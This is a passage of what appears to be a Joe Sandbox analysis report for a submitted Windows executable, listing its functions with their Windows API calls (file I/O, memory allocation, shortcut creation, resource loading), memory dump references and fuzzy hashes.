Instruction Fuzzy Hash: 8CF030351046529FC330DF69C584853F7E4EB59715721887FE1D6D36A2C674A880CB64

Function 0040D9F0 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040DA0B
GetLastError.KERNEL32(?,?,?,?), ref: 0040DA19

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
Instruction ID: d86f9e507f4e039952bd1031b0dc001be1b0661bb6f0ed5f18f0f7cd7a7605a3
Opcode Fuzzy Hash: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
Instruction Fuzzy Hash: FCF0B2B8A04208FFCB04CFA8D8448AE7BB9EB49314B2085A9F815A7390D735DA04DF64

Function 0040ECED Relevance: 3.0, APIs: 2, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 0040ED05
_CxxThrowException.MSVCRT(?,00415010), ref: 0040ED28

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: AllocExceptionStringThrow
String ID:
API String ID: 3773818493-0
Opcode ID: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
Instruction ID: 896a1b371a95ab63a3f889c911e7bff8eb1facf706b7c8fcc1dab20228dace7a
Opcode Fuzzy Hash: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
Instruction Fuzzy Hash: CDE06D71600309ABDB10AF66D8419D67BE8EF00380B00C83FF948CA250E779E590C7D9

Function 0040E73A Relevance: 2.5, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 0040E745
LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040E764

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
Instruction ID: 086d926b78662e0ab04275255430a857868cdabe8091615e808f779c17768b54
Opcode Fuzzy Hash: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
Instruction Fuzzy Hash: 76F05436200214FBCB119F95DC08E9BBBB9FF49761F14842AF945E7260C771E821DBA4

Function 0040A7DE Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040A7E3

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
Instruction ID: 39d544f4fee3d18347c8ea8d59cce7c7d4ef222c74644271f89bd24cd9d44c54
Opcode Fuzzy Hash: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
Instruction Fuzzy Hash: 4B2180316003099BCB14EFA5C945AAE73B5EF40344F14843EF806BB291DB38DD16CB1A

Function 0040120B Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?), ref: 0040124F

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
Instruction ID: 5817d5120c2da98d16edaa91ace5ca285f5b3ff1e58b2ffd557e42fef7bfdc6e
Opcode Fuzzy Hash: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
Instruction Fuzzy Hash: 66F05E72100201DBC720AF98C840BA777F5BB84314F04483EE583F2AA0D778B885CB59

Function 0040DA56 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040D985: CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990

CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50), ref: 0040DA78

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
Instruction ID: 040011ad7fb3de3f437c6c7e3ebc1dcda5640d8293b7e84d035d3e38099293ab
Opcode Fuzzy Hash: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
Instruction Fuzzy Hash: A1E04F32140219ABCF215FA49C01BCA7B96AF09760F144526BE11A61E0C672D465AF94

Function 0040DB97 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040DD78,00000001,00000000,00000000,00413330,?,00404D94,?,?), ref: 0040DBBA

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
Instruction ID: ec3d056ad33d5175d1bee219b94afd5900c8108b90431a53c6143dcb1d381838
Opcode Fuzzy Hash: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
Instruction Fuzzy Hash: D7E0C275600208FBCB00CF95C801B9E7BBABB49755F10C069F918AA2A0D739AA10DF54

Function 0040653F Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_beginthreadex.MSVCRT ref: 00406552

Part of subcall function 00406501: GetLastError.KERNEL32(00406563,00000000), ref: 004064F5

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ErrorLast_beginthreadex
String ID:
API String ID: 4034172046-0
Opcode ID: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
Instruction ID: fe95790bd269afcad05a26a3721163fc0b830ac61c9b3c5b6bbddf8a66cf2d64
Opcode Fuzzy Hash: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
Instruction Fuzzy Hash: 12D05EF6400208BFDF01DFE0DC05CAB3BADEB08204B004464FD05C2150E632DA108B60

Function 0040CC59 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040CC5E

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
Instruction ID: 312fbe8762c42e8d4a239ae194adb86e93363bc1e5443e54fb58aca6058f63a2
Opcode Fuzzy Hash: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
Instruction Fuzzy Hash: 70D05EB2A04108FBE7109F85D946BEEFB78EB80399F10823FB506B1150D7BC5A0196AD

Function 0040DADC Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040DAF2

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
Instruction ID: c05821c64f4412cbb188b0f884d423eaa3d686fb1c941f6ac6705c8b1bb703da
Opcode Fuzzy Hash: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
Instruction Fuzzy Hash: 58E0EC75211208FFDB01CF90CD01FDE7BBDFB49755F208058E90596160C7759A10EB54

Function 0040DB6A Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON

Download Yara Rule

APIs

SetFileTime.KERNELBASE(?,?,?,?,0040DB94,00000000,00000000,?,0040123C,?), ref: 0040DB78

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: FileTime
String ID:
API String ID: 1425588814-0
Opcode ID: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
Instruction ID: c6000770aa4fb4c72b4925fc402daec6625791e8065b7518697746b49206ca3e
Opcode Fuzzy Hash: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
Instruction Fuzzy Hash: 40C04C3A199105FF8F020F70CD04C1ABBA2AB95722F10C918B199C4070CB328424EB02

Function 0040D89F Relevance: 1.3, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000060,?,?,00000000,?,0040D96E,00000000,?,00000000,00000000,000000FF,?,00000001,?,?,?), ref: 0040D91A

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 22fae346508b387be620676aefe54f5ba332bfd43235a82cb31898e5e1b252f2
Instruction ID: 1ceb60bf2594cd826c4dcd58ac8a3e75a9726935558582f6c117c88f0dd7e0c4
Opcode Fuzzy Hash: 22fae346508b387be620676aefe54f5ba332bfd43235a82cb31898e5e1b252f2
Instruction Fuzzy Hash: 4A219372A042858FCF30FF91D98096B77A5AF50358320853FE093732C1DA38AD49D75A

Function 0040F42D Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0040F446

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
Instruction ID: 8ccd5c106adaedd21fdabd868c2a091acccb285e2c6396e7c66228af9079aab7
Opcode Fuzzy Hash: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
Instruction Fuzzy Hash: 68E0ED311087008BEB74DA38A941F97B3DAAB14314F15893FE89AE7690EB74FC448A59

Function 00402F6C Relevance: 1.3, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 8c656c2e1a3b1113b906896464f2e87f63fa16c9f402e9948991ae45e955b1b9
Instruction ID: 194059228ff5733793a196764ebf5a0b63d959e09992ce12dff2d54d27d13516
Opcode Fuzzy Hash: 8c656c2e1a3b1113b906896464f2e87f63fa16c9f402e9948991ae45e955b1b9
Instruction Fuzzy Hash: 67D0A9313083121ADA5432320A09AAF84848B503A0F10083FB800A32D1DCBE8C81A299

Function 0040D985 Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
Instruction ID: 71cfb53d0268b44c797f7400575dcc0518408263689e7c465582b3111ebcfb94
Opcode Fuzzy Hash: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
Instruction Fuzzy Hash: 95D0127251422156CF646E7CB8849C277D85A06334335176AF0B4E32E4D3749DCB5698

Function 004024C4 Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040E4D6,00020000,00000000,?,00000000,?,0040D92B,?,?,00000000,?,0040D96E), ref: 004024E0

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
Instruction ID: 23ad038ad5ccaf642d49e1102795c1c714580f299e31bec6e074b0e2bc220d86
Opcode Fuzzy Hash: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
Instruction Fuzzy Hash: D3C080301443007DED115F505E06B463A916B44717F508065F344540D0C7F484009509

Function 00401B1F Relevance: 1.3, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,0040E561,?,00000004,0040E5B0,?,?,004117E5,?), ref: 00401B2A

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
Instruction ID: 5381ed20748db0b7fd93371e38984c83fa4171db9cf80dc6a42123bab5888d64
Opcode Fuzzy Hash: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
Instruction Fuzzy Hash: 45A002305446007ADE515B10DD05F457F516744B11F20C5547155540E586755654DA09

Function 0040F3FC Relevance: 1.3, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0040F400

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
Instruction ID: 7baee4be7330d58fba6a4d3e6254b3dabd4481adb37f3967e502ba2394f26960
Opcode Fuzzy Hash: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
Instruction Fuzzy Hash:

Non-executed Functions

Function 004034C1 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 290comCOMMON

Download Yara Rule

APIs

_wtol.MSVCRT ref: 004034E5
SHGetSpecialFolderPathW.SHELL32(00000000,?,CC5BE863,00000000,004177A0,00000000,00417794), ref: 00403588
??3@YAXPAX@Z.MSVCRT(?,?), ref: 004035F9
??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403601
??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403609
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403611
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403619
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403621
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403629
_wtol.MSVCRT ref: 0040367F
CoCreateInstance.OLE32(00414BF4,00000000,00000001,00414BE4,00404F9B,.lnk,?,0000005C), ref: 00403720
??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 004037B8
??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 004037C0
??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 004037C8
??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 004037D0
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 004037D8
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 004037E0
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 004037E8
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 004037EE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 004037F6

Strings

.lnk, xrefs: 004036FF

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
String ID: .lnk
API String ID: 408529070-24824748
Opcode ID: fe29b86850b6584a4f253c84e51755890519a5cebd41027cd42a07a926e32aa0
Instruction ID: c4a1d47ac56633071a1bd2db01059e5edb54ffe0bccc65637149caefe5d2277b
Opcode Fuzzy Hash: fe29b86850b6584a4f253c84e51755890519a5cebd41027cd42a07a926e32aa0
Instruction Fuzzy Hash: 8EA18A71910219ABDF04EFA1CC46DEEBB79EF44705F50442AF502B71A1EB79AA81CB18

Function 00401BDF Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
